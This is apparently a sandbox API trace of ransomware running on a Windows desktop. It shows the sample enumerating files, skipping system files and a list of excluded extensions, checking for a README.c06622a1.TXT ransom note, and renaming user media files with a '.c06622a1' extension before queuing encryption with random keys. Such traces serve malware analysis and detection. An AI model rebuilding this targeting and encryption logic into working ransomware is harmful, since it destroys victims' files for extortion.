[0147.643] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.643] wcscpy (in: _Dest=0x44d00cc, _Source="C5glW.m4a" | out: _Dest="C5glW.m4a") returned="C5glW.m4a" [0147.643] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a", dwFileAttributes=0x80) returned 1 [0147.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c5glw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0147.644] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.644] ReadFile (in: hFile=0x640, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.645] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x833eda9 [0147.645] RtlComputeCrc32 (PartialCrc=0xeda9, Buffer=0x3feb74, Length=0x80) returned 0x73c26ee8 [0147.645] RtlComputeCrc32 (PartialCrc=0x6ee8, Buffer=0x3feb74, Length=0x80) returned 0xd9272dc3 [0147.645] RtlComputeCrc32 (PartialCrc=0x2dc3, Buffer=0x3feb74, Length=0x80) returned 0x41d9307b [0147.645] RtlComputeCrc32 (PartialCrc=0x307b, Buffer=0x3feb74, Length=0x80) returned 0x55cbf7c9 [0147.645] CloseHandle (hObject=0x640) returned 1 [0147.645] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.645] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a" [0147.645] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a") returned 0x33 [0147.645] wcscpy (in: _Dest=0x44e00e6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.645] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c5glw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c5glw.m4a.c06622a1"), dwFlags=0x8) returned 1 [0147.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C5glW.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c5glw.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0147.649] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.649] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd78276 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b25a2db [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b46daf3 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf066ee1 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7101e9 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15c12018 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d36dd17 [0147.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6391e213 [0147.659] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0xcaef115c [0147.659] RtlComputeCrc32 (PartialCrc=0x115c, Buffer=0x49d0094, Length=0x80) returned 0x2be920ea [0147.659] RtlComputeCrc32 (PartialCrc=0x20ea, Buffer=0x49d0094, Length=0x80) returned 0xfde24a09 [0147.659] RtlComputeCrc32 (PartialCrc=0x4a09, Buffer=0x49d0094, Length=0x80) returned 0xa84253d6 [0147.659] RtlComputeCrc32 (PartialCrc=0x53d6, Buffer=0x49d0094, Length=0x80) returned 0xf0f7cba9 [0147.659] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0147.659] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.659] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.659] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f579800, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0x8f579800, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0x93a5200, ftLastWriteTime.dwHighDateTime=0x1d6f254, nFileSizeHigh=0x0, nFileSizeLow=0xec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe", cAlternateFileName="CUSERS~1.EXE")) returned 1 [0147.659] _wcsicmp (_Str1="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe", _Str2="README.c06622a1.TXT") returned -15 [0147.659] wcsstr (_Str="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe", _SubStr="README") returned 0x0 [0147.659] _wcsicmp (_Str1="autorun.inf", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned -2 [0147.659] wcslen (_String="autorun.inf") returned 0xb [0147.659] _wcsicmp (_Str1="boot.ini", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned -1 [0147.659] wcslen (_String="boot.ini") returned 0x8 [0147.659] _wcsicmp (_Str1="bootfont.bin", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned -1 [0147.659] wcslen (_String="bootfont.bin") returned 0xc [0147.659] _wcsicmp (_Str1="bootsect.bak", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned -1 [0147.659] wcslen (_String="bootsect.bak") returned 0xc [0147.659] _wcsicmp (_Str1="desktop.ini", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 1 [0147.659] wcslen (_String="desktop.ini") returned 0xb [0147.659] _wcsicmp (_Str1="iconcache.db", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 6 [0147.659] wcslen (_String="iconcache.db") returned 0xc [0147.659] _wcsicmp (_Str1="ntldr", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 11 [0147.659] wcslen (_String="ntldr") returned 0x5 [0147.659] _wcsicmp (_Str1="ntuser.dat", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 11 [0147.659] wcslen (_String="ntuser.dat") returned 0xa [0147.660] _wcsicmp (_Str1="ntuser.dat.log", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 11 [0147.660] wcslen (_String="ntuser.dat.log") returned 0xe [0147.660] _wcsicmp (_Str1="ntuser.ini", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 11 [0147.660] wcslen (_String="ntuser.ini") returned 0xa [0147.660] _wcsicmp (_Str1="thumbs.db", _Str2="CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned 17 [0147.660] wcslen (_String="thumbs.db") returned 0x9 [0147.660] _wcsicmp (_Str1="386", _Str2="exe") returned -50 [0147.660] wcslen (_String="386") returned 0x3 [0147.660] _wcsicmp (_Str1="adv", _Str2="exe") returned -4 [0147.660] wcslen (_String="adv") returned 0x3 [0147.660] _wcsicmp (_Str1="ani", _Str2="exe") returned -4 [0147.660] wcslen (_String="ani") returned 0x3 [0147.660] _wcsicmp (_Str1="bat", _Str2="exe") returned -3 [0147.660] wcslen (_String="bat") returned 0x3 [0147.660] _wcsicmp (_Str1="bin", _Str2="exe") returned -3 [0147.660] wcslen (_String="bin") returned 0x3 [0147.660] _wcsicmp (_Str1="cab", _Str2="exe") returned -2 [0147.660] wcslen (_String="cab") returned 0x3 [0147.660] _wcsicmp (_Str1="cmd", _Str2="exe") returned -2 [0147.660] wcslen (_String="cmd") returned 0x3 [0147.660] _wcsicmp (_Str1="com", _Str2="exe") returned -2 [0147.660] wcslen (_String="com") returned 0x3 [0147.660] _wcsicmp (_Str1="cpl", _Str2="exe") returned -2 [0147.660] wcslen (_String="cpl") returned 0x3 [0147.660] _wcsicmp (_Str1="cur", _Str2="exe") returned -2 [0147.660] wcslen (_String="cur") returned 0x3 [0147.660] _wcsicmp (_Str1="deskthemepack", _Str2="exe") returned -1 [0147.660] wcslen (_String="deskthemepack") returned 0xd [0147.660] _wcsicmp (_Str1="diagcab", _Str2="exe") returned -1 [0147.661] wcslen (_String="diagcab") returned 0x7 [0147.661] _wcsicmp (_Str1="diagcfg", _Str2="exe") returned -1 [0147.661] wcslen (_String="diagcfg") returned 0x7 [0147.661] _wcsicmp (_Str1="diagpkg", _Str2="exe") returned -1 [0147.661] wcslen (_String="diagpkg") returned 0x7 [0147.661] _wcsicmp (_Str1="dll", _Str2="exe") returned -1 [0147.661] wcslen (_String="dll") returned 0x3 [0147.661] _wcsicmp (_Str1="drv", _Str2="exe") returned -1 [0147.661] wcslen (_String="drv") returned 0x3 [0147.661] _wcsicmp (_Str1="exe", _Str2="exe") returned 0 [0147.661] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeeb1a0, ftCreationTime.dwHighDateTime=0x1d5e2e0, ftLastAccessTime.dwLowDateTime=0x5fe159b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb9, ftLastWriteTime.dwLowDateTime=0x5fe159b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb9, nFileSizeHigh=0x0, nFileSizeLow=0xaa48, dwReserved0=0x0, dwReserved1=0x0, cFileName="CyezILaJLHLWO3wcsD5.bmp", cAlternateFileName="CYEZIL~1.BMP")) returned 1 [0147.661] _wcsicmp (_Str1="CyezILaJLHLWO3wcsD5.bmp", _Str2="README.c06622a1.TXT") returned -15 [0147.661] wcsstr (_Str="CyezILaJLHLWO3wcsD5.bmp", _SubStr="README") returned 0x0 [0147.661] _wcsicmp (_Str1="autorun.inf", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned -2 [0147.661] wcslen (_String="autorun.inf") returned 0xb [0147.661] _wcsicmp (_Str1="boot.ini", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned -1 [0147.661] wcslen (_String="boot.ini") returned 0x8 [0147.661] _wcsicmp (_Str1="bootfont.bin", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned -1 [0147.661] wcslen (_String="bootfont.bin") returned 0xc [0147.661] _wcsicmp (_Str1="bootsect.bak", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned -1 [0147.661] wcslen (_String="bootsect.bak") returned 0xc [0147.661] _wcsicmp (_Str1="desktop.ini", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 1 [0147.661] wcslen (_String="desktop.ini") returned 0xb [0147.661] _wcsicmp (_Str1="iconcache.db", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 6 [0147.661] wcslen (_String="iconcache.db") returned 0xc [0147.661] _wcsicmp (_Str1="ntldr", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 11 [0147.661] wcslen (_String="ntldr") returned 0x5 [0147.661] _wcsicmp (_Str1="ntuser.dat", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 11 [0147.661] wcslen (_String="ntuser.dat") returned 0xa [0147.661] _wcsicmp (_Str1="ntuser.dat.log", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 11 [0147.662] wcslen (_String="ntuser.dat.log") returned 0xe [0147.662] _wcsicmp (_Str1="ntuser.ini", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 11 [0147.662] wcslen (_String="ntuser.ini") returned 0xa [0147.662] _wcsicmp (_Str1="thumbs.db", _Str2="CyezILaJLHLWO3wcsD5.bmp") returned 17 [0147.662] wcslen (_String="thumbs.db") returned 0x9 [0147.662] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0147.662] wcslen (_String="386") returned 0x3 [0147.662] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0147.662] wcslen (_String="adv") returned 0x3 [0147.662] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0147.662] wcslen (_String="ani") returned 0x3 [0147.662] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0147.662] wcslen (_String="bat") returned 0x3 [0147.662] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0147.662] wcslen (_String="bin") returned 0x3 [0147.662] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0147.662] wcslen (_String="cab") returned 0x3 [0147.662] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0147.662] wcslen (_String="cmd") returned 0x3 [0147.662] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0147.662] wcslen (_String="com") returned 0x3 [0147.662] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0147.662] wcslen (_String="cpl") returned 0x3 [0147.662] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0147.662] wcslen (_String="cur") returned 0x3 [0147.662] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0147.662] wcslen (_String="deskthemepack") returned 0xd [0147.662] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0147.662] wcslen (_String="diagcab") returned 0x7 [0147.662] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0147.663] wcslen (_String="diagcfg") returned 0x7 [0147.663] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0147.663] wcslen (_String="diagpkg") returned 0x7 [0147.663] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0147.663] wcslen (_String="dll") returned 0x3 [0147.663] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0147.663] wcslen (_String="drv") returned 0x3 [0147.663] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0147.663] wcslen (_String="exe") returned 0x3 [0147.663] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0147.663] wcslen (_String="hlp") returned 0x3 [0147.663] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0147.663] wcslen (_String="icl") returned 0x3 [0147.663] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0147.663] wcslen (_String="icns") returned 0x4 [0147.663] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0147.663] wcslen (_String="ico") returned 0x3 [0147.663] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0147.663] wcslen (_String="ics") returned 0x3 [0147.663] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0147.663] wcslen (_String="idx") returned 0x3 [0147.663] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0147.663] wcslen (_String="ldf") returned 0x3 [0147.663] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0147.663] wcslen (_String="lnk") returned 0x3 [0147.663] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0147.663] wcslen (_String="mod") returned 0x3 [0147.663] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0147.663] wcslen (_String="mpa") returned 0x3 [0147.663] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0147.663] wcslen (_String="msc") returned 0x3 [0147.664] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0147.664] wcslen (_String="msp") returned 0x3 [0147.664] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0147.664] wcslen (_String="msstyles") returned 0x8 [0147.664] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0147.664] wcslen (_String="msu") returned 0x3 [0147.664] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0147.664] wcslen (_String="nls") returned 0x3 [0147.664] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0147.664] wcslen (_String="nomedia") returned 0x7 [0147.664] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0147.664] wcslen (_String="ocx") returned 0x3 [0147.664] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0147.664] wcslen (_String="prf") returned 0x3 [0147.664] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0147.664] wcslen (_String="ps1") returned 0x3 [0147.664] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0147.664] wcslen (_String="rom") returned 0x3 [0147.664] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0147.664] wcslen (_String="rtp") returned 0x3 [0147.664] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0147.664] wcslen (_String="scr") returned 0x3 [0147.664] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0147.664] wcslen (_String="shs") returned 0x3 [0147.664] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0147.664] wcslen (_String="spl") returned 0x3 [0147.664] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0147.664] wcslen (_String="sys") returned 0x3 [0147.664] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0147.664] wcslen (_String="theme") returned 0x5 [0147.664] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0147.665] wcslen (_String="themepack") returned 0x9 [0147.665] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0147.665] wcslen (_String="wpx") returned 0x3 [0147.665] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0147.665] wcslen (_String="lock") returned 0x4 [0147.665] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0147.665] wcslen (_String="key") returned 0x3 [0147.665] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0147.665] wcslen (_String="hta") returned 0x3 [0147.665] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0147.665] wcslen (_String="msi") returned 0x3 [0147.665] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0147.665] wcslen (_String="pdb") returned 0x3 [0147.665] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0147.665] wcslen (_String="sql") returned 0x3 [0147.665] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0147.665] wcslen (_String="sqlite") returned 0x6 [0147.665] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.665] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.665] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.665] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.665] wcscpy (in: _Dest=0x44d00cc, _Source="CyezILaJLHLWO3wcsD5.bmp" | out: _Dest="CyezILaJLHLWO3wcsD5.bmp") returned="CyezILaJLHLWO3wcsD5.bmp" [0147.665] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp", dwFileAttributes=0x80) returned 1 [0147.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyezilajlhlwo3wcsd5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0147.666] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.666] ReadFile (in: hFile=0x620, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.667] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x64a8b0e6 [0147.667] RtlComputeCrc32 (PartialCrc=0xb0e6, Buffer=0x3feb74, Length=0x80) returned 0x52d5891b [0147.667] RtlComputeCrc32 (PartialCrc=0x891b, Buffer=0x3feb74, Length=0x80) returned 0xcd6e39b7 [0147.667] RtlComputeCrc32 (PartialCrc=0x39b7, Buffer=0x3feb74, Length=0x80) returned 0x8120140d [0147.667] RtlComputeCrc32 (PartialCrc=0x140d, Buffer=0x3feb74, Length=0x80) returned 0x55d14017 [0147.667] CloseHandle (hObject=0x620) returned 1 [0147.667] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.667] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp" [0147.667] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp") returned 0x41 [0147.667] wcscpy (in: _Dest=0x44e0102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.667] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyezilajlhlwo3wcsd5.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyezilajlhlwo3wcsd5.bmp.c06622a1"), dwFlags=0x8) returned 1 [0147.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CyezILaJLHLWO3wcsD5.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyezilajlhlwo3wcsd5.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0147.670] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.670] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0147.675] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f5f9e7d [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x511355b6 [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4504d8f7 [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32f9ffec [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4fea1558 [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe635282 [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3e00871e [0147.676] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66fb5e7f [0147.679] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x8285f7dd [0147.679] RtlComputeCrc32 (PartialCrc=0xf7dd, Buffer=0x4a60094, Length=0x80) returned 0x21f71e5f [0147.679] RtlComputeCrc32 (PartialCrc=0x1e5f, Buffer=0x4a60094, Length=0x80) returned 0x30021807 [0147.679] RtlComputeCrc32 (PartialCrc=0x1807, Buffer=0x4a60094, Length=0x80) returned 0x35494e2d [0147.679] RtlComputeCrc32 (PartialCrc=0x4e2d, Buffer=0x4a60094, Length=0x80) returned 0x564b1c79 [0147.679] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0147.679] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.679] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.679] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.679] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0147.679] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0147.679] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0147.679] wcslen (_String="autorun.inf") returned 0xb [0147.679] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0147.679] wcslen (_String="boot.ini") returned 0x8 [0147.679] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0147.679] wcslen (_String="bootfont.bin") returned 0xc [0147.679] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0147.679] wcslen (_String="bootsect.bak") returned 0xc [0147.679] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0147.680] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbce761a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xe291dee0, ftLastAccessTime.dwHighDateTime=0x1d5de9d, ftLastWriteTime.dwLowDateTime=0xe291dee0, ftLastWriteTime.dwHighDateTime=0x1d5de9d, nFileSizeHigh=0x0, nFileSizeLow=0xe2f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="dOl_g7LT8L5bk.flv", cAlternateFileName="DOL_G7~1.FLV")) returned 1 [0147.680] _wcsicmp (_Str1="dOl_g7LT8L5bk.flv", _Str2="README.c06622a1.TXT") returned -14 [0147.680] wcsstr (_Str="dOl_g7LT8L5bk.flv", _SubStr="README") returned 0x0 